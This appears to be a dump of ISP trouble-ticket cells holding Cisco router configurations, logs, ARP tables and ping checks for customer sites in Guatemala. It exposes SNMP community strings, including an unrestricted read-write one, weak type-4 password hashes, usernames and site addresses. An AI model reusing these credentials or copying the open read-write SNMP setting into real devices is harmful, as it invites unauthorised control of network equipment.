POLICY-MAP 10MBPS
 CLASS CLASS-DEFAULT
  POLICE RATE 10000000  BURST 1920000  PEAK-BURST 3840000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.198.100 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/97100276T/_/
 BANDWIDTH 10000
 IP ADDRESS 10.78.153.105 255.255.255.224
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 NO IP ADDRESS
 SHUTDOWN
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION INTERFAZ NO ESTA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION INTERFAZ NO ESTA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/2
 DESCRIPTION INTERFAZ NO ESTA EN USO
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1/3
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 10000
 IP ADDRESS 10.70.0.46 255.255.255.248 SECONDARY
 IP ADDRESS 10.43.6.254 255.255.255.0
 LOAD-INTERVAL 30
 SERVICE-POLICY INPUT 10MBPS
 SERVICE-POLICY OUTPUT 10MBPS
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.78.153.97
!
!
IP ACCESS-LIST EXTENDED ACCESO
 PERMIT IP 190.148.15.192 0.0.0.15 ANY
 PERMIT IP 10.255.24.144 0.0.0.7 ANY
 PERMIT IP 10.0.0.0 0.255.255.255 ANY
 PERMIT IP 192.168.0.0 0.0.255.255 ANY
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 2 PERMIT 10.1.1.198
ACCESS-LIST 2 PERMIT 10.1.20.128 0.0.0.15
ACCESS-LIST 2 PERMIT 10.2.10.192 0.0.0.15
ACCESS-LIST 2 PERMIT 10.2.26.192 0.0.0.15
ACCESS-LIST 2 PERMIT 10.25.1.0 0.0.0.255
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
ACCESS-LIST 110 PERMIT IP 10.2.10.192 0.0.0.15 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP 10.25.1.0 0.0.0.255 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP 10.1.20.128 0.0.0.15 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP 10.2.26.192 0.0.0.15 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP 10.2.0.48 0.0.0.3 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP HOST 10.2.0.50 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP HOST 10.2.0.51 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP HOST 10.1.1.198 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP HOST 10.2.1.34 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP HOST 10.2.25.57 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP 10.25.1.0 0.0.0.31 HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP HOST 10.2.25.234 HOST 10.43.6.254
ACCESS-LIST 110 DENY   ICMP ANY ANY TIMESTAMP-REPLY
ACCESS-LIST 110 DENY   IP ANY HOST 10.43.6.254
ACCESS-LIST 110 PERMIT IP ANY ANY
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER COMMUNITY YES! RW
SNMP-SERVER COMMUNITY YES RO RD
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION CARRETERA A EL SALVADOR KM.19 LOTE 5-B LOTIFICACION MONTE CARLO FRAIJANES
!
!
CONTROL-PLAN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TRANSPORT INPUT NONE
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS ACCESO IN
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
!
!
!
!
!
END
CC_PRONE_GT_MONTE_CARLOS_FRAIJANES#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 52 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 52 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 55 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
ROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*MAY 21 08:47:59.715: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LSMPI0, CHANGED STATE TO UP
*MAY 21 08:47:59.715: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EOBC0, CHANGED STATE TO UP
*MAY 21 08:47:59.715: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LIIN0, CHANGED STATE TO UP
*MAY 21 08:48:00.664: %ONEP_BASE-6-SS_ENABLED: ONEP: SERVICE SET BASE WAS ENABLED BY DEFAULT
*MAY 21 08:48:03.172: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED TP-SELF-SIGNED-2951722698 HAS BEEN GENERATED OR IMPORTED BY CRYPTO CONFIG
*MAY 21 08:48:03.185: %SYS-2-PRIVCFG_DECRYPT: SUCCESSFULLY APPLY THE PRIVATE CONFIG FILE
*MAY 21 08:48:03.337: %AAA-5-USER_RESET: USER GESTIONIP FAILED ATTEMPTS RESET BY VTY0
*MAY 21 08:48:03.351: %AAA-5-USER_RESET: USER CERVECERIA FAILED ATTEMPTS RESET BY VTY0
*MAY 21 08:48:03.370: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*MAY 21 08:48:03.630: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*MAY 21 08:48:03.656: %IOSXE_OIR-6-REMSPA: SPA REMOVED FROM SUBSLOT 0/0, INTERFACES DISABLED
*MAY 21 08:48:03.657: %IOSXE_OIR-6-REMSPA: SPA REMOVED FROM SUBSLOT 0/1, INTERFACES DISABLED
*MAY 21 08:48:03.667: %SPA_OIR-6-OFFLINECARD: SPA (C1111-2X1GE) OFFLINE IN SUBSLOT 0/0
*MAY 21 08:48:03.675: %SPA_OIR-6-OFFLINECARD: SPA (C1111-ES-4) OFFLINE IN SUBSLOT 0/1
*MAY 21 08:48:03.718: %IOSXE_OIR-6-INSCARD: CARD (FP) INSERTED IN SLOT F0
*MAY 21 08:48:03.718: %IOSXE_OIR-6-ONLINECARD: CARD (FP) ONLINE IN SLOT F0
*MAY 21 08:48:03.730: %IOSXE_OIR-6-INSCARD: CARD (CC) INSERTED IN SLOT 0
*MAY 21 08:48:03.730: %IOSXE_OIR-6-ONLINECARD: CARD (CC) ONLINE IN SLOT 0
*MAY 21 08:48:03.796: %IOSXE_OIR-6-INSSPA: SPA INSERTED IN SUBSLOT 0/0
*MAY 21 08:48:03.800: %IOSXE_OIR-6-INSSPA: SPA INSERTED IN SUBSLOT 0/1
*MAY 21 08:48:03.964: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE [GIBRALTAR], ISR SOFTWARE (ARMV8EL_LINUX_IOSD-UNIVERSALK9_IAS-M), VERSION 16.10.1B, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2018 BY CISCO SYSTEMS, INC.
COMPILED WED 12-DEC-18 01:49 BY MCPRE
*MAY 21 08:48:04.010: %SSH-5-ENABLED: SSH 1.99 HAS BEEN ENABLED
*MAY 21 08:48:04.730: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED TP-SELF-SIGNED-2951722698.SERVER HAS BEEN GENERATED OR IMPORTED BY CRYPTO-ENGINE
*MAY 21 08:48:05.732: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_PRONE_GT_MONTE_CARLOS_FRAIJANES IS UNDERGOING A COLD START
*MAY 21 08:48:08.581: %SPA_OIR-6-ONLINECARD: SPA (C1111-2X1GE) ONLINE IN SUBSLOT 0/0
*MAY 21 08:48:09.259: %SPA_OIR-6-ONLINECARD: SPA (C1111-ES-4) ONLINE IN SUBSLOT 0/1
*MAY 21 08:48:10.253: %PNP-6-PNP_DISCOVERY_STOPPED: PNP DISCOVERY STOPPED (STARTUP CONFIG PRESENT)
*MAY 21 08:48:10.498: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 21 08:48:11.247: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO DOWN
*MAY 21 08:48:15.861: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO UP
*MAY 21 08:48:16.376: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 21 08:48:16.859: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO UP
*MAY 21 08:48:16.868: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*MAY 21 08:48:17.376: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 21 08:48:18.686: %CRYPTO_ENGINE-5-KEY_ADDITION: A KEY NAMED CISCO_IDEVID_SUDI HAS BEEN GENERATED OR IMPORTED BY PKI-SUDI
*MAY 21 08:48:18.711: %PKI-2-NON_AUTHORITATIVE_CLOCK: PKI FUNCTIONS CAN NOT BE INITIALIZED UNTIL AN AUTHORITATIVE TIME SOURCE, LIKE NTP, CAN BE OBTAINED.
*MAY 21 08:48:34.972: %CALL_HOME-6-CALL_HOME_ENABLED: CALL-HOME IS ENABLED BY SMART AGENT FOR LICENSING.
*MAY 21 08:48:34.972: %SMART_LIC-5-COMM_RESTORED: COMMUNICATIONS WITH THE CISCO SMART SOFTWARE MANAGER OR SATELLITE RESTORED
*MAY 21 09:13:08.236: %SEC_LOGIN-5-LOGIN_SUCCESS: LOGIN SUCCESS [USER: GESTIONIP] [SOURCE: 10.78.153.97] [LOCALPORT: 23] AT 09:13:08 UTC SAT MAY 21 2022
CC_PRONE_GT_MONTE_CARLOS_FRAIJANES#
SHOW CLOCK
*09:13:36.313 UTC SAT MAY 21 2022
CC_PRONE_GT_MONTE_CARLOS_FRAIJANES#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.43.6.1               0   F439.090E.BED8  ARPA   VLAN1
INTERNET  10.43.6.11              0   F439.090E.EA33  ARPA   VLAN1
INTERNET  10.43.6.150             0   F45B.7396.3F10  ARPA   VLAN1
INTERNET  10.43.6.254             -   2416.9D57.9FF4  ARPA   VLAN1
INTERNET  10.70.0.46              -   2416.9D57.9FF4  ARPA   VLAN1
INTERNET  10.78.153.97            5   DC99.147A.7B49  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.78.153.105           -   2416.9D57.9F80  ARPA   GIGABITETHERNET0/0/0
CC_PRONE_GT_MONTE_CARLOS_FRAIJANES#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0/0                        UP             UP       WAN PRINCIPAL/_/97100276T/_/
GI0/0/1                        ADMIN DOWN     DOWN
GI0/1/0                        ADMIN DOWN     DOWN     INTERFAZ NO ESTA EN USO
GI0/1/1                        ADMIN DOWN     DOWN     INTERFAZ NO ESTA EN USO
GI0/1/2                        ADMIN DOWN     DOWN     INTERFAZ NO ESTA EN USO
GI0/1/3                        UP             UP
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_PRONE_GT_MONTE_CARLOS_FRAIJANES#
SHOW IP INT BRIEF
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.78.153.105   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/0   UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/1   UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/2   UNASSIGNED      YES UNSET  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/1/3   UNASSIGNED      YES UNSET  UP                    UP
LOOPBACK5              10.212.198.100  YES NVRAM  UP                    UP
VLAN1                  10.43.6.254     YES NVRAM  UP                    UP
CC_PRONE_GT_MONTE_CARLOS_FRAIJANES#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN PRONE 10.78.153.105
  PING 10.78.153.105: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.78.153.105 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.15
DISPLAY IP ROUTING-TABLE VPN-INSTANCE PRONE 10.78.153.105
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : PRONE
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.78.153.105/32  DIRECT  0    0                 0.0.0.0         VLANIF43			</t>
  </si>
  <si>
    <t>F4572231</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO POR PARTE DE CLARO SEPORCEDE CON CIERRE POR ENERGIA COMERCIAL
TIKAL#PING VRF TYT 192.168.159.62
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 192.168.159.62, TIMEOUT IS 2 SECONDS:
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/2/4 MS
TIKAL#
PE
10.184.12.6
TIKAL#SHOW IP ROUTE VRF TYT 192.168.159.62
ROUTING TABLE: TYT
ROUTING ENTRY FOR 192.168.159.60/30
  KNOWN VIA "CONNECTED", DISTANCE 0, METRIC 0 (CONNECTED, VIA INTERFACE)
  REDISTRIBUTING VIA BGP 13682
  ADVERTISED BY BGP 13682
  ROUTING DESCRIPTOR BLOCKS:
  * DIRECTLY CONNECTED, VIA GIGABITETHERNET9/9.1703
      ROUTE METRIC IS 0, TRAFFIC SHARE COUNT IS 1
TIKAL#</t>
  </si>
  <si>
    <t>F4572247</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVOSE PROCEDE CON CIERRE .
ROUTER CPE ACTIVO HACE 31 SEMANA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025 UPTIME IS 31 WEEKS, 1 DAY, 18 HOURS, 46 MINUTES
SYSTEM RETURNED TO ROM BY RELOAD
SYSTEM RESTARTED AT 15:13:00 UTC THU OCT 14 2021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2485G1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2485G1
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0025#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4411 BYTES
!
! LAST CONFIGURATION CHANGE AT 02:27:11 UTC THU MAR 24 2022 BY GESTIONIP
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0025
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX162485G1
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.39 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/8900538T/_/
 BANDWIDTH 5120
 NO IP ADDRESS
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
INTERFACE GIGABITETHERNET0/0.1
 DESCRIPTION WAN PRINCIPAL/_/8900538T/_/
 BANDWIDTH 5120
 ENCAPSULATION DOT1Q 184
 IP ADDRESS 10.16.195.167 255.255.255.224
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN REDUNDANTE/_/8901755T/_/
 BANDWIDTH 2048
 IP ADDRESS 10.16.195.200 255.255.255.224
 RATE-LIMIT INPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 2048000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE FASTETHERNET0/0/0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/1
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/2
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0/0/3
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.130.25.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.160.25.126 255.255.255.0
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
INTERFACE BVI1
 NO IP ADDRESS
!
ROUTER OSPF 1
 ROUTER-ID 10.16.195.167
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.16.195.160 0.0.0.31 AREA 164
 NEIGHBOR 10.16.195.161
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.16.195.193 220
!
!
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.120.39/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.160.25.0/24
IP PREFIX-LIST CONNECTED SEQ 130 PERMIT 10.130.25.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5 CALLE 6-53 ZONA 1 MALACATAN, SAN MARCOS
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD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025#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 48643 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 48643 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 48647 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
INE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:48:03.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:48:05.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:48:06.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:48:20.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:48:21.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:48:23.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:48:24.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:48:50.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:48:51.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:48:54.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:48:55.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:49:10.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:49:11.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:49:14.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:49:15.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:49:42.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:49:43.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:49:46.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:49:47.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:49:53.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:49:54.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:49:57.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:49:58.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:50:03.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:50:04.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:50:07.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:50:08.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:50:23.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:50:24.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:50:26.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:50:27.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:50:41.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:50:42.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:50:45.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:50:46.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:50:59.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:51:00.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:51:03.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:51:04.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:51:17.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:51:18.181 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:51:21.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:51:22.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:52:47.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:52:48.181 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 21 09:52:51.173 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:52:52.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 21 09:53:13.173 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
